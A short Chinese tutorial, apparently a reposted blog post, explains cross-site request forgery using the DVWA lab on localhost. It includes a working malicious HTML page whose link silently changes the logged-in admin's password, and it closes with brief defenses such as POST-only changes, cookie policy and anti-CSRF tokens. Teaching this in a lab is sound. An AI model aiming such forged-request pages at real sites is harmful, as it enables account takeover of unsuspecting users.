首先什么是CSRF:
如图:
1,用户通过浏览器正常访问带有CSRF漏洞的网站。
如我去访问http://127.0.0.1:8080/DVWA/login.php
我们登录进去账号是:admin 密码是:password,找到一个修改密码的地方
修改密码为123456,修改的url是:
http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/password_new=123456&password_conf=123456&Change=Change#
2,我们构造恶意网站B将代码保存为index.html
<html> <head> <title>这是恶意网页</title> </head> <body> <h2>这是恶意网页<h2> <a href="http://127.0.0.1:8080/DVWA/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">***</a> </body> </html>
我们访问网站B:点击***
我们可以看到密码被改了(改成了password)
防御:
1.尽量使用POST,限制GET
2.浏览器Cookie策略
3.Anti CSRF Token
微信公众号:
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。